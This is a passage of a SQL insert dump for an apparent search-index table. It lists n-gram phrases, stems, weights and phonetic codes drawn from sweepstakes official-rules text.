year','1 year',0,1,1.2,'Y600',1,'en'),(25081,'1 year of','1 year of',0,1,1.3,'Y610',1,'en'),(25082,'1000','1000',0,0,0.4,'',1,'en'),(25083,'1000 and','1000 and',0,1,1.2667,'A530',1,'en'),(25084,'1000 and comprises','1000 and comprises',0,1,1.6,'A5325162',1,'en'),(25085,'10017','10017',0,0,0.5,'',1,'en'),(25086,'10017 3204','10017 3204',0,1,1.3333,'',1,'en'),(25087,'10017.you','10017.you',0,0,0.6,'Y000',1,'en'),(25088,'10017.you must','10017.you must',0,1,1.4667,'Y523',1,'en'),(25089,'10017.you must follow','10017.you must follow',0,1,1.7,'Y52314',1,'en'),(25090,'1099','1099',0,0,0.4,'',1,'en'),(25091,'1099 misc','1099 misc',0,1,1.3,'M200',1,'en'),(25092,'1099 misc tax','1099 misc tax',0,1,1.4333,'M232',1,'en'),(25093,'10th','10th',0,0,0.2667,'T000',1,'en'),(25094,'10th bottom','10th bottom',0,1,1.3667,'T135',1,'en'),(25095,'10th bottom nyc','10th bottom nyc',0,1,1.5,'T1352',1,'en'),(25096,'10th hardwood','10th hardwood',0,1,1.4333,'T630',1,'en'),(25097,'10th hardwood base','10th hardwood base',0,1,1.6,'T6312',1,'en'),(25098,'12 2007.odds','12 2007.odds',0,1,1.4,'O320',1,'en'),(25099,'12 2007.odds of','12 2007.odds of',0,1,1.5,'O321',1,'en'),(25100,'132','132',0,0,0.3,'',1,'en'),(25101,'14 days','14 days',0,1,1.2333,'D200',1,'en'),(25102,'14 days after','14 days after',0,1,1.4333,'D2136',1,'en'),(25103,'14 days the','14 days the',0,1,1.3667,'D230',1,'en'),(25104,'18 yrs','18 yrs',0,1,1.2,'Y620',1,'en'),(25105,'18 yrs old','18 yrs old',0,1,1.3333,'Y6243',1,'en'),(25106,'19th','19th',0,0,0.2667,'T000',1,'en'),(25107,'19th 2007.the','19th 2007.the',0,1,1.4333,'T000',1,'en'),(25108,'19th 2007.the winner','19th 2007.the winner',0,1,1.6667,'T560',1,'en'),(25109,'2 2007.max','2 2007.max',0,1,1.3333,'M200',1,'en'),(25110,'2 2007.max one','2 2007.max one',0,1,1.4667,'M250',1,'en'),(25111,'2 500','2 500',0,1,1.1667,'',1,'en'),(25112,'2 500 american','2 500 american',0,1,1.4667,'A5625',1,'en'),(25113,'2007','2007',0,0,0.4,'',2,'en'),(25114,'2007 and','2007 and',0,1,1.2667,'A530',1,'en'),(25115,'2007 and all','2007 and all',0,1,1.4,'A534',1,'en'),(25116,'2007 guide','2007 guide',0,1,1.3333,'G300',1,'en'),(25117,'2007 guide to','2007 guide to',0,1,1.4333,'G300',1,'en'),(25118,'2007.max','2007.max',0,0,0.5333,'M200',1,'en'),(25119,'2007.max one','2007.max one',0,1,1.4,'M250',1,'en'),(25120,'2007.max one 1','2007.max one 1',0,1,1.4667,'M250',1,'en'),(25121,'2007.odds','2007.odd',0,0,0.6,'O320',1,'en'),(25122,'2007.odds of','2007.odd of',0,1,1.4,'O321',1,'en'),(25123,'2007.odds of winning','2007.odd of winning',0,1,1.6667,'O32152',1,'en'),(25124,'2007.the','2007.the',0,0,0.5333,'T000',1,'en'),(25125,'2007.the winner','2007.the winner',0,1,1.5,'T560',1,'en'),(25126,'2007.the winner must','2007.the winner must',0,1,1.6667,'T56523',1,'en'),(25127,'2nd','2nd',0,0,0.2,'N300',1,'en'),(25128,'2nd 2007','2nd 2007',0,1,1.2667,'N300',1,'en'),(25129,'2nd 2007 and','2nd 2007 and',0,1,1.4,'N353',1,'en'),(25130,'3204','3204',0,0,0.4,'',1,'en'),(25131,'3rd','3rd',0,0,0.2,'R300',1,'en'),(25132,'3rd ave','3rd ave',0,1,1.2333,'R310',1,'en'),(25133,'3rd ave 10th','3rd ave 10th',0,1,1.4,'R313',1,'en'),(25134,'5 days','5 days',0,1,1.2,'D200',1,'en'),(25135,'5 days from','5 days from',0,1,1.3667,'D2165',1,'en'),(25136,'500','500',0,0,0.3,'',1,'en'),(25137,'500 american','500 american',0,1,1.4,'A5625',1,'en'),(25138,'500 american express','500 american express',0,1,1.6667,'A56252162',1,'en'),(25139,'6.marketing','6.market',0,0,0.7333,'M62352',1,'en'),(25140,'6.marketing release','6.market release',0,1,1.6333,'M62352642',1,'en'),(25141,'6.marketing release use','6.market release use',0,1,1.7667,'M62352642',1,'en'),(25142,'600.no','600.no',0,0,0.4,'N000',1,'en'),(25143,'600.no download','600.no download',0,1,1.5,'N3543',1,'en'),(25144,'600.no download tax','600.no download tax',0,1,1.6333,'N35432',1,'en'),(25145,'733','733',0,0,0.3,'',1,'en'),(25146,'733 3rd','733 3rd',0,1,1.2333,'R300',1,'en'),(25147,'733 3rd ave','733 3rd ave',0,1,1.3667,'R310',1,'en'),(25148,'733 third','733 third',0,1,1.3,'T630',1,'en'),(25149,'733 third ave','733 third ave',0,1,1.4333,'T631',1,'en'),(25150,'a burden','a burden',0,1,1.2667,'A1635',1,'en'),(25151,'a burden on','a burden on',0,1,1.3667,'A1635',1,'en'),(25152,'a campaigns','a campaigns',0,1,1.3667,'A251252',1,'en'),(25153,'a campaigns trade','a campaigns trade',0,1,1.5667,'A251252363',1,'en'),(25154,'a express','a express',0,1,1.3,'A2162',1,'en'),(25155,'a express warranties','a express warranties',0,1,1.6667,'A21626532',1,'en'),(25156,'a legislation','a legislation',0,1,1.4333,'A42435',1,'en'),(25157,'a legislation that','a legislation that',0,1,1.6,'A424353',1,'en'),(25158,'a minor','a minor',0,1,1.2333,'A560',1,'en'),(25159,'a minor would','a minor would',0,1,1.4333,'A5643',1,'en'),(25160,'a name','a name',0,1,1.2,'A500',1,'en'),(25161,'a name that','a name that',0,1,1.3667,'A530',1,'en'),(25162,'a new prospects','a new prospects',0,1,1.5,'A51621232',1,'en'),(25163,'a person\'s','a person',0,1,1.3333,'A16252',1,'en'),(25164,'a person\'s affidavit','a person affidavit',0,1,1.6667,'A162521313',1,'en'),(25165,'a prize','a prize',0,1,1.2333,'A162',1,'en'),(25166,'a prize cannot','a prize cannot',0,1,1.4667,'A16253',1,'en'),(25167,'a prize of','a prize of',0,1,1.3333,'A1621',1,'en'),(25168,'a purchase','a purchase',0,1,1.3333,'A162',1,'en'),(25169,'a purchase or','a purchase or',0,1,1.4333,'A1626',1,'en'),(25170,'a reasonable','a reasonable',0,1,1.4,'A62514',1,'en'),(25171,'a reasonable effort','a reasonable effort',0,1,1.6333,'A62514163',1,'en'),(25172,'a registered','a registered',0,1,1.4,'A62363',1,'en'),(25173,'a registered trademark','a registered trademark',0,1,1.7333,'A6236363562',1,'en'),(25174,'a resident','a resident',0,1,1.3333,'A62353',1,'en'),(25175,'a resident of','a resident of',0,1,1.4333,'A623531',1,'en'),(25176,'a signed','a signed',0,1,1.2667,'A253',1,'en'),(25177,'a signed give','a signed give',0,1,1.4333,'A25321',1,'en'),(25178,'a software program','a software program',0,1,1.6,'A213616265',1,'en'),(25179,'a sponsor','a sponsor',0,1,1.3,'A21526',1,'en'),(25180,'a sponsor of','a sponsor of',0,1,1.4,'A215261',1,'en'),(25181,'a time','a time',0,1,1.2,'A350',2,'en'),(25182,'a time limited','a time limited',0,1,1.4667,'A35453',1,'en'),(25183,'a total','a total',0,1,1.2333,'A340',1,'en'),(25184,'a total of','a total of',0,1,1.3333,'A341',1,'en'),(25185,'a y','a y',0,1,1.1,'A000',1,'en'),(25186,'a y potential','a y potential',0,1,1.4333,'A13534',1,'en'),(25187,'a year','a year',0,1,1.2,'A600',2,'en'),(25188,'a year whether','a year whether',0,1,1.4667,'A636',1,'en'),(25189,'abilities presentation','abil presentation',0,1,1.7333,'A1432162535',1,'en'),(25190,'abilities presentation and','abil presentation and',0,1,1.8667,'A14321625353',1,'en'),(25191,'able to enter','abl to enter',0,1,1.4333,'A143536',1,'en'),(25192,'about the','about the',0,1,1.3,'A130',2,'en'),(25193,'about the sweepstakes','about the sweepstakes',0,1,1.7,'A1321232',1,'en'),(25194,'above 600.no','abov 600.no',0,1,1.4,'A150',1,'en'),(25195,'above 600.no download','abov 600.no download',0,1,1.7,'A153543',1,'en'),(25196,'above or','abov or',0,1,1.2667,'A160',1,'en'),(25197,'above or within','abov or within',0,1,1.5,'A1635',1,'en'),(25198,'accept','accept',0,0,0.4,'A213',1,'en'),(25199,'accept the','accept the',0,1,1.3333,'A213',1,'en'),(25200,'accept the prize','accept the prize',0,1,1.5333,'A213162',1,'en'),(25201,'acceptance','accept',0,0,0.6667,'A21352',1,'en'),(25202,'acceptance and','accept and',0,1,1.4667,'A2135253',1,'en'),(25203,'acceptance and or','accept and or',0,1,1.5667,'A21352536',1,'en'),(25204,'acceptance of','accept of',0,1,1.4333,'A213521',1,'en'),(25205,'acceptance of prize','accept of prize',0,1,1.6333,'A21352162',1,'en'),(25206,'accepted','accept',0,0,0.5333,'A213',2,'en'),(25207,'accepted or','accept or',0,1,1.3667,'A2136',1,'en'),(25208,'accepted or unclaimed','accept or unclaimed',0,1,1.7,'A213652453',1,'en'),(25209,'accepted rodale','accept rodale',0,1,1.5,'A213634',1,'en'),(25210,'accepted rodale shall','accept rodale shall',0,1,1.7,'A21363424',1,'en'),(25211,'accordance','accord',0,0,0.6667,'A26352',1,'en'),(25212,'accordance with','accord with',0,1,1.5,'A263523',1,'en'),(25213,'accordance with any','accord with any',0,1,1.6333,'A2635235',1,'en'),(25214,'according to the','accord to the',0,1,1.5333,'A263523',1,'en'),(25215,'accountability','account',0,0,0.9333,'A253143',1,'en'),(25216,'accountability including','account including',0,1,1.8,'A253143524352',1,'en'),(25217,'accountability including but','account including but',0,1,1.9333,'A25314352435213',1,'en'),(25218,'acknowledge','acknowledg',0,0,0.7333,'A25432',1,'en'),(25219,'acknowledge that','acknowledg that',0,1,1.5333,'A254323',1,'en'),(25220,'acknowledge that sponsor','acknowledg that sponsor',0,1,1.8,'A25432321526',1,'en'),(25221,'acknowledged','acknowledg',0,0,0.8,'A254323',1,'en'),(25222,'acknowledged or','acknowledg or',0,1,1.5,'A2543236',1,'en'),(25223,'acknowledged or returned','acknowledg or returned',0,1,1.8,'A25432363653',1,'en'),(25224,'acknowledgement','acknowledg',0,0,1,'A2543253',1,'en'),(25225,'acknowledgement thing','acknowledg thing',0,1,1.7,'A254325352',1,'en'),(25226,'acknowledgement thing help','acknowledg thing help',0,1,1.8667,'A25432535241',1,'en'),(25227,'acknowledging','acknowledg',0,0,0.8667,'A2543252',1,'en'),(25228,'acknowledging the','acknowledg the',0,1,1.5667,'A25432523',1,'en'),(25229,'acknowledging the prize','acknowledg the prize',0,1,1.7667,'A25432523162',1,'en'),(25230,'acting','act',0,0,0.4,'A2352',1,'en'),(25231,'acting in','act in',0,1,1.3,'A23525',1,'en'),(25232,'acting in violation','act in violation',0,1,1.6333,'A235251435',1,'en'),(25233,'action','action',0,0,0.4,'A235',1,'en'),(25234,'action based','action based',0,1,1.4,'A235123',1,'en'),(25235,'action based on','action based on',0,1,1.5,'A2351235',1,'en'),(25236,'activities','activ',0,0,0.6667,'A23132',1,'en'),(25237,'activities shall','activ shall',0,1,1.5333,'A231324',1,'en'),(25238,'activities shall be','activ shall be',0,1,1.6333,'A2313241',1,'en'),(25239,'activities sponsor','activ sponsor',0,1,1.6,'A231321526',1,'en'),(25240,'activities sponsor reserves','activ sponsor reserves',0,1,1.9,'A2313215262612',1,'en'),(25241,'activity','activ',0,0,0.5333,'A2313',1,'en'),(25242,'activity and','activ and',0,1,1.4,'A231353',1,'en'),(25243,'activity and for','activ and for',0,1,1.5333,'A23135316',1,'en'),(25244,'acts','act',0,0,0.2667,'A232',1,'en'),(25245,'acts of','act of',0,1,1.2333,'A2321',1,'en'),(25246,'acts of god','act of god',0,1,1.3667,'A232123',1,'en'),(25247,'actual date','actual date',0,1,1.3667,'A2343',1,'en'),(25248,'actual date sponsor','actual date sponsor',0,1,1.6333,'A234321526',1,'en'),(25249,'actual tampering','actual tampering',0,1,1.5333,'A234351652',1,'en'),(25250,'actual tampering with','actual tampering with',0,1,1.7,'A2343516523',1,'en'),(25251,'acumen','acumen',0,0,0.4,'A250',1,'en'),(25252,'acumen to','acumen to',0,1,1.3,'A253',1,'en'),(25253,'acumen to disqualify','acumen to disqualify',0,1,1.6667,'A253241',1,'en'),(25254,'ad trade','ad trade',0,1,1.2667,'A363',1,'en'),(25255,'ad trade and','ad trade and',0,1,1.4,'A36353',1,'en'),(25256,'add your','add your',0,1,1.2667,'A360',1,'en'),(25257,'add your name','add your name',0,1,1.4333,'A365',1,'en'),(25258,'adding emotional','ad emotional',0,1,1.5333,'A3525354',1,'en'),(25259,'adding emotional distress','ad emotional distress',0,1,1.8333,'A352535432362',1,'en'),(25260,'addition k','addit k',0,1,1.3333,'A352',1,'en'),(25261,'addition k entering','addit k entering',0,1,1.6333,'A35253652',1,'en'),(25262,'addition to','addit to',0,1,1.3667,'A353',1,'en'),(25263,'addition to your','addit to your',0,1,1.5333,'A3536',1,'en'),(25264,'additional','addit',0,0,0.6667,'A354',3,'en'),(25265,'additional eligible','addit eligible',0,1,1.6333,'A354214',1,'en'),(25266,'additional eligible entries','addit eligible entries',0,1,1.9,'A3542145362',1,'en'),(25267,'address','address',0,0,0.4667,'A362',2,'en'),(25268,'address and','address and',0,1,1.3667,'A36253',1,'en'),(25269,'address and mail','address and mail',0,1,1.5333,'A3625354',1,'en'),(25270,'address changes','address changes',0,1,1.5,'A36252',1,'en'),(25271,'address changes after','address changes after',0,1,1.7,'A36252136',1,'en'),(25272,'address properly','address properly',0,1,1.5333,'A36216164',1,'en'),(25273,'address properly enter','address properly enter',0,1,1.7333,'A36216164536',1,'en'),(25274,'address stated','address stated',0,1,1.4667,'A3623',1,'en'),(25275,'address stated below','address stated below',0,1,1.6667,'A362314',1,'en'),(25276,'addresses','address',0,0,0.6,'A362',1,'en'),(25277,'addresses or','address or',0,1,1.4,'A3626',1,'en'),(25278,'addresses or the','address or the',0,1,1.5333,'A36263',1,'en'),(25279,'administered','administ',0,0,0.8,'A352363',1,'en'),(25280,'administered by','administ by',0,1,1.5,'A3523631',1,'en'),(25281,'administered by mail','administ by mail',0,1,1.6667,'A352363154',1,'en'),(25282,'administration of the','administr of the',0,1,1.7,'A352363513',1,'en'),(25283,'advertising','advertis',0,0,0.7333,'A3163252',2,'en'),(25284,'advertising all','advertis all',0,1,1.5,'A31632524',1,'en'),(25285,'advertising all other','advertis all other',0,1,1.7,'A3163252436',1,'en'),(25286,'advertising or','advertis or',0,1,1.4667,'A31632526',1,'en'),(25287,'advertising or promoting','advertis or promoting',0,1,1.8,'A31632526165352',1,'en'),(25288,'affidavit','affidavit',0,0,0.6,'A1313',1,'en'),(25289,'affidavit any','affidavit any',0,1,1.4333,'A13135',1,'en'),(25290,'affidavit any client','affidavit any client',0,1,1.6667,'A131352453',1,'en'),(25291,'affidavit is','affidavit is',0,1,1.4,'A13132',1,'en'),(25292,'affidavit is returned','affidavit is returned',0,1,1.7,'A1313263653',1,'en'),(25293,'affidavit of','affidavit of',0,1,1.4,'A13131',1,'en'),(25294,'affidavit of qualifications','affidavit of qualifications',0,1,1.9,'A131312412352',1,'en'),(25295,'affidavit or','affidavit or',0,1,1.4,'A13136',1,'en'),(25296,'affidavit or prize','affidavit or prize',0,1,1.6,'A13136162',1,'en'),(25297,'affidavit related','affidavit related',0,1,1.5667,'A1313643',1,'en'),(25298,'affidavit related repayments','affidavit related repayments',0,1,1.9333,'A131364361532',1,'en'),(25299,'affidavit well','affidavit well',0,1,1.4667,'A13134',1,'en'),(25300,'affidavit well as','affidavit well as',0,1,1.5667,'A131342',1,'en'),(25301,'affidavit within','affidavit within',0,1,1.5333,'A13135',1,'en'),(25302,'affidavit within fourteen','affidavit within fourteen',0,1,1.8333,'A131351635',1,'en'),(25303,'affiliate','affili',0,0,0.6,'A143',1,'en'),(25304,'affiliate any','affili any',0,1,1.4333,'A1435',1,'en'),(25305,'affiliate any dispute','affili any dispute',0,1,1.7,'A14353213',1,'en'),(25306,'affiliate web','affili web',0,1,1.4333,'A1431',1,'en'),(25307,'affiliate web sites','affili web sites',0,1,1.6333,'A1431232',1,'en'),(25308,'affiliated','affili',0,0,0.6667,'A143',1,'en'),(25309,'affiliated any','affili any',0,1,1.4667,'A1435',1,'en'),(25310,'affiliated any way','affili any way',0,1,1.6,'A1435',1,'en'),(25311,'affiliates','affili',0,0,0.6667,'A1432',1,'en'),(25312,'affiliates and','affili and',0,1,1.4667,'A143253',1,'en'),(25313,'affiliates and successor','affili and successor',0,1,1.8,'A14325326',1,'en'),(25314,'affiliates except','affili except',0,1,1.5667,'A143213',1,'en'),(25315,'affiliates except where','affili except where',0,1,1.7667,'A1432136',1,'en'),(25316,'affiliates sponsor','affili sponsor',0,1,1.6,'A14321526',1,'en'),(25317,'affiliates sponsor and','affili sponsor and',0,1,1.7333,'A1432152653',1,'en'),(25318,'affixed','affix',0,0,0.4667,'A123',1,'en'),(25319,'affixed so','affix so',0,1,1.3333,'A1232',1,'en'),(25320,'affixed so that','affix so that',0,1,1.5,'A12323',1,'en'),(25321,'aforesaid','aforesaid',0,0,0.6,'A1623',1,'en'),(25322,'aforesaid cycles','aforesaid cycles',0,1,1.5333,'A1623242',1,'en'),(25323,'aforesaid cycles f','aforesaid cycles f',0,1,1.6,'A16232421',1,'en'),(25324,'after a reasonable','after a reasonable',0,1,1.6,'A1362514',1,'en'),(25325,'after he','after he',0,1,1.2667,'A136',2,'en'),(25326,'after he she','after he she',0,1,1.4,'A1362',1,'en'),(25327,'after receipt','after receipt',0,1,1.4333,'A136213',1,'en'),(25328,'after receipt by','after receipt by',0,1,1.5333,'A1362131',1,'en'),(25329,'age','ag',0,0,0.2,'A200',2,'en'),(25330,'age of','ag of',0,1,1.2,'A210',2,'en'),(25331,'age of majority','ag of majority',0,1,1.5,'A215263',1,'en'),(25332,'agents','agent',0,0,0.4,'A2532',1,'en'),(25333,'agents officers','agent officers',0,1,1.5,'A25321262',1,'en'),(25334,'agents officers and','agent officers and',0,1,1.6333,'A2532126253',1,'en'),(25335,'agouritorito','agouritorito',0,0,0.8,'A26363',1,'en'),(25336,'agouritorito any','agouritorito any',0,1,1.5333,'A263635',1,'en'),(25337,'agouritorito any inability','agouritorito any inability',0,1,1.8667,'A263635143',1,'en'),(25338,'agree','agre',0,0,0.3333,'A260',1,'en'),(25339,'agree and','agre and',0,1,1.3,'A2653',1,'en'),(25340,'agree and consent','agre and consent',0,1,1.5667,'A265325253',1,'en'),(25341,'agree to','agre to',0,1,1.2667,'A263',1,'en'),(25342,'agree to be','agre to be',0,1,1.3667,'A2631',1,'en'),(25343,'agree to liberate','agre to liberate',0,1,1.5667,'A2634163',1,'en'),(25344,'agreement','agreement',0,0,0.6,'A2653',1,'en'),(25345,'agreement and','agreement and',0,1,1.4333,'A265353',1,'en'),(25346,'agreement and consent','agreement and consent',0,1,1.7,'A26535325253',1,'en'),(25347,'agrees','agre',0,0,0.4,'A262',1,'en'),(25348,'agrees that','agre that',0,1,1.3667,'A2623',1,'en'),(25349,'agrees that any','agre that any',0,1,1.5,'A26235',1,'en'),(25350,'airwaves','airwav',0,0,0.5333,'A612',1,'en'),(25351,'airwaves cable','airwav cable',0,1,1.4667,'A61214',1,'en'),(25352,'airwaves cable electronic','airwav cable electronic',0,1,1.8333,'A6121423652',1,'en'),(25353,'all applicable','all applicable',0,1,1.4667,'A414214',1,'en'),(25354,'all applicable terms','all applicable terms',0,1,1.6667,'A4142143652',1,'en'),(25355,'all country','all country',0,1,1.3667,'A42536',1,'en'),(25356,'all country wide','all country wide',0,1,1.5333,'A425363',1,'en'),(25357,'all eligible','all eligible',0,1,1.4,'A4214',1,'en'),(25358,'all eligible entries','all eligible entries',0,1,1.6667,'A42145362',1,'en'),(25359,'all entries','all entries',0,1,1.3667,'A45362',1,'en'),(25360,'all entries become','all entries become',0,1,1.6,'A45362125',1,'en'),(25361,'all inadvertent','all inadvertent',0,1,1.5,'A45316353',1,'en'),(25362,'all inadvertent expenses','all inadvertent expenses',0,1,1.8,'A453163532152',1,'en'),(25363,'all info','all info',0,1,1.2667,'A451',1,'en'),(25364,'all info requested','all info requested',0,1,1.6,'A451623',1,'en'),(25365,'all issues','all issues',0,1,1.3333,'A420',1,'en'),(25366,'all issues and','all issues and',0,1,1.4667,'A4253',1,'en'),(25367,'all mail','all mail',0,1,1.2667,'A454',1,'en'),(25368,'all mail in','all mail in',0,1,1.3667,'A4545',1,'en'),(25369,'all other','all other',0,1,1.3,'A436',1,'en'),(25370,'all other countries','all other countries',0,1,1.6333,'A43625362',1,'en'),(25371,'all other expenses','all other expenses',0,1,1.6,'A4362152',1,'en'),(25372,'all points','all points',0,1,1.3333,'A41532',1,'en'),(25373,'all points to','all points to',0,1,1.4333,'A415323',1,'en'),(25374,'all respects','all respects',0,1,1.4,'A4621232',1,'en'),(25375,'all respects if','all respects if',0,1,1.5,'A46212321',1,'en'),(25376,'all respects in','all respects in',0,1,1.5,'A46212325',1,'en'),(25377,'all terms','all terms',0,1,1.3,'A43652',1,'en'),(25378,'all terms that','all terms that',0,1,1.4667,'A436523',1,'en'),(25379,'allies','alli',0,0,0.4,'A420',1,'en'),(25380,'allies specialists','alli specialists',0,1,1.6,'A42124232',1,'en'),(25381,'allies specialists brokers','alli specialists brokers',0,1,1.8667,'A4212423216262',1,'en'),(25382,'allow','allow',0,0,0.3333,'A400',2,'en'),(25383,'allow sponsor','allow sponsor',0,1,1.4333,'A421526',1,'en'),(25384,'allow sponsor to','allow sponsor to',0,1,1.5333,'A4215263',1,'en'),(25385,'almost any','almost any',0,1,1.3333,'A45235',1,'en'),(25386,'almost any forms','almost any forms',0,1,1.5333,'A452351652',1,'en'),(25387,'also by','also by',0,1,1.2333,'A421',1,'en'),(25388,'also by entering','also by entering',0,1,1.5333,'A42153652',1,'en'),(25389,'also the entry','also the entry',0,1,1.4667,'A423536',1,'en'),(25390,'also you','also you',0,1,1.2667,'A420',2,'en'),(25391,'also you have','also you have',0,1,1.4333,'A421',1,'en'),(25392,'altered','alter',0,0,0.4667,'A4363',2,'en'),(25393,'altered or','alter or',0,1,1.3333,'A43636',1,'en'),(25394,'altered or reproduced','alter or reproduced',0,1,1.7,'A4363616323',1,'en'),(25395,'alternate','altern',0,0,0.6,'A43653',1,'en'),(25396,'alternate potential','altern potential',0,1,1.6333,'A4365313534',1,'en'),(25397,'alternate potential winner','altern potential winner',0,1,1.8667,'A436531353456',1,'en'),(25398,'alternative','altern',0,0,0.7333,'A436531',1,'en'),(25399,'alternative clause','altern clause',0,1,1.6,'A436531242',1,'en'),(25400,'alternative clause by','altern clause by',0,1,1.7,'A4365312421',1,'en'),(25401,'alternative or','altern or',0,1,1.4667,'A4365316',1,'en'),(25402,'alternative or replacing','altern or replacing',0,1,1.8,'A436531614252',1,'en'),(25403,'american','american',0,0,0.5333,'A5625',1,'en'),(25404,'american express','american express',0,1,1.5333,'A56252162',1,'en'),(25405,'american express company','american express company',0,1,1.8,'A56252162515',1,'en'),(25406,'american express gift','american express gift',0,1,1.7,'A5625216213',1,'en'),(25407,'american express is','american express is',0,1,1.6333,'A56252162',1,'en'),(25408,'among additional','among additional',0,1,1.5333,'A52354',1,'en'),(25409,'among additional eligible','among additional eligible',0,1,1.8333,'A52354214',1,'en'),(25410,'among all','among all',0,1,1.3,'A524',1,'en'),(25411,'among all eligible','among all eligible',0,1,1.6,'A524214',1,'en'),(25412,'amount of eligible','amount of eligible',0,1,1.6,'A5314214',1,'en'),(25413,'an actual','an actual',0,1,1.3,'A5234',1,'en'),(25414,'an actual tampering','an actual tampering',0,1,1.6333,'A5234351652',1,'en'),(25415,'an affidavit','an affidavit',0,1,1.4,'A51313',1,'en'),(25416,'an affidavit of','an affidavit of',0,1,1.5,'A513131',1,'en'),(25417,'an affiliate','an affiliate',0,1,1.4,'A5143',1,'en'),(25418,'an affiliate any','an affiliate any',0,1,1.5333,'A51435',1,'en'),(25419,'an alternate','an alternate',0,1,1.4,'A543653',1,'en'),(25420,'an alternate potential','an alternate potential',0,1,1.7333,'A54365313534',1,'en'),(25421,'an appropriate','an appropriate',0,1,1.4667,'A516163',1,'en'),(25422,'an appropriate in','an appropriate in',0,1,1.5667,'A5161635',1,'en'),(25423,'an example','an example',0,1,1.3333,'A52514',2,'en'),(25424,'an example by','an example by',0,1,1.4333,'A525141',1,'en'),(25425,'an irs','an irs',0,1,1.2,'A562',1,'en'),(25426,'an irs federal','an irs federal',0,1,1.4667,'A5621364',1,'en'),(25427,'and advertising','and advertising',0,1,1.5,'A53163252',1,'en'),(25428,'and advertising all','and advertising all',0,1,1.6333,'A531632524',1,'en'),(25429,'and agree','and agree',0,1,1.3,'A5326',1,'en'),(25430,'and agree to','and agree to',0,1,1.4,'A53263',1,'en'),(25431,'and all applicable','and all applicable',0,1,1.6,'A53414214',1,'en'),(25432,'and all inadvertent','and all inadvertent',0,1,1.6333,'A5345316353',1,'en'),(25433,'and all mail','and all mail',0,1,1.4,'A53454',1,'en'),(25434,'and all other','and all other',0,1,1.4333,'A53436',1,'en'),(25435,'and all terms','and all terms',0,1,1.4333,'A5343652',1,'en'),(25436,'and also','and also',0,1,1.2667,'A5342',1,'en'),(25437,'and also the','and also the',0,1,1.4,'A53423',1,'en'),(25438,'and also you','and also you',0,1,1.4,'A5342',1,'en'),(25439,'and an','and an',0,1,1.2,'A535',1,'en'),(25440,'and an alternate','and an alternate',0,1,1.5333,'A53543653',1,'en'),(25441,'and any','and any',0,1,1.2333,'A535',1,'en'),(25442,'and any other','and any other',0,1,1.4333,'A53536',1,'en'),(25443,'and awarding','and awarding',0,1,1.4,'A536352',1,'en'),(25444,'and awarding the','and awarding the',0,1,1.5333,'A5363523',1,'en'),(25445,'and binding','and binding',0,1,1.3667,'A5315352',1,'en'),(25446,'and binding in','and binding in',0,1,1.4667,'A53153525',1,'en'),(25447,'and biographical','and biographical',0,1,1.5333,'A53126124',1,'en'),(25448,'and biographical data','and biographical data',0,1,1.7,'A531261243',1,'en'),(25449,'and company','and company',0,1,1.3667,'A532515',1,'en'),(25450,'and company owners','and company owners',0,1,1.6,'A53251562',1,'en'),(25451,'and comprises','and comprises',0,1,1.4333,'A5325162',1,'en'),(25452,'and comprises of','and comprises of',0,1,1.5333,'A53251621',1,'en'),(25453,'and consent','and consent',0,1,1.3667,'A5325253',1,'en'),(25454,'and consent for','and consent for',0,1,1.5,'A532525316',1,'en'),(25455,'and consent to','and consent to',0,1,1.4667,'A5325253',1,'en'),(25456,'and construed','and construed',0,1,1.4333,'A53252363',1,'en'),(25457,'and construed according','and construed according',0,1,1.7667,'A5325236326352',1,'en'),(25458,'and dad','and dad',0,1,1.2333,'A530',1,'en'),(25459,'and dad step','and dad step',0,1,1.4,'A53231',1,'en'),(25460,'and directors','and directors',0,1,1.4333,'A5362362',1,'en'),(25461,'and directors assume','and directors assume',0,1,1.6667,'A53623625',1,'en'),(25462,'and directors shall','and directors shall',0,1,1.6333,'A53623624',1,'en'),(25463,'and disclosure','and disclosure',0,1,1.4667,'A532426',1,'en'),(25464,'and disclosure of','and disclosure of',0,1,1.5667,'A5324261',1,'en'),(25465,'and email','and email',0,1,1.3,'A5354',1,'en'),(25466,'and email address','and email address',0,1,1.5667,'A5354362',1,'en'),(25467,'and endorse','and endorse',0,1,1.3667,'A535362',1,'en'),(25468,'and endorse this','and endorse this',0,1,1.5333,'A53536232',1,'en'),(25469,'and enforceability','and enforceability',0,1,1.6,'A535162143',1,'en'),(25470,'and enforceability of','and enforceability of',0,1,1.7,'A5351621431',1,'en'),(25471,'and entrants','and entrants',0,1,1.4,'A53536532',1,'en'),(25472,'and entrants may','and entrants may',0,1,1.5333,'A535365325',1,'en'),(25473,'and entries','and entries',0,1,1.3667,'A535362',1,'en'),(25474,'and entries assets','and entries assets',0,1,1.6,'A53536232',1,'en'),(25475,'and entry','and entry',0,1,1.3,'A53536',1,'en'),(25476,'and entry chemicals','and entry chemicals',0,1,1.6333,'A5353625242',1,'en'),(25477,'and europe','and europe',0,1,1.3333,'A5361',1,'en'),(25478,'and europe excluding','and europe excluding',0,1,1.6667,'A536124352',1,'en'),(25479,'and executed','and executed',0,1,1.4,'A5323',1,'en'),(25480,'and executed winners','and executed winners',0,1,1.6667,'A5323562',1,'en'),(25481,'and family','and family',0,1,1.3333,'A53154',1,'en'),(25482,'and family of','and family of',0,1,1.4333,'A531541',1,'en'),(25483,'and final','and final',0,1,1.3,'A53154',1,'en'),(25484,'and final in','and final in',0,1,1.4,'A531545',1,'en'),(25485,'and for','and for',0,1,1.2333,'A5316',3,'en'),(25486,'and for any','and for any',0,1,1.3667,'A53165',1,'en'),(25487,'and get','and get',0,1,1.2333,'A5323',1,'en'),(25488,'and get back','and get back',0,1,1.4,'A532312',1,'en'),(25489,'and hold','and hold',0,1,1.2667,'A5343',1,'en'),(25490,'and hold harmless','and hold harmless',0,1,1.5667,'A53436542',1,'en'),(25491,'and in perpetuity','and in perpetuity',0,1,1.5667,'A5351613',1,'en'),(25492,'and is','and is',0,1,1.2,'A532',3,'en'),(25493,'and is not','and is not',0,1,1.3333,'A53253',1,'en'),(25494,'and is void','and is void',0,1,1.3667,'A53213',1,'en'),(25495,'and its parent','and its parent',0,1,1.4667,'A5321653',1,'en'),(25496,'and local','and local',0,1,1.3,'A53424',1,'en'),(25497,'and local laws','and local laws',0,1,1.4667,'A534242',1,'en'),(25498,'and local taxes','and local taxes',0,1,1.5,'A5342432',1,'en'),(25499,'and mail','and mail',0,1,1.2667,'A5354',1,'en'),(25500,'and mail to','and mail to',0,1,1.3667,'A53543',1,'en'),(25501,'and obligations','and obligations',0,1,1.5,'A53142352',1,'en'),(25502,'and obligations of','and obligations of',0,1,1.6,'A531423521',1,'en'),(25503,'and or','and 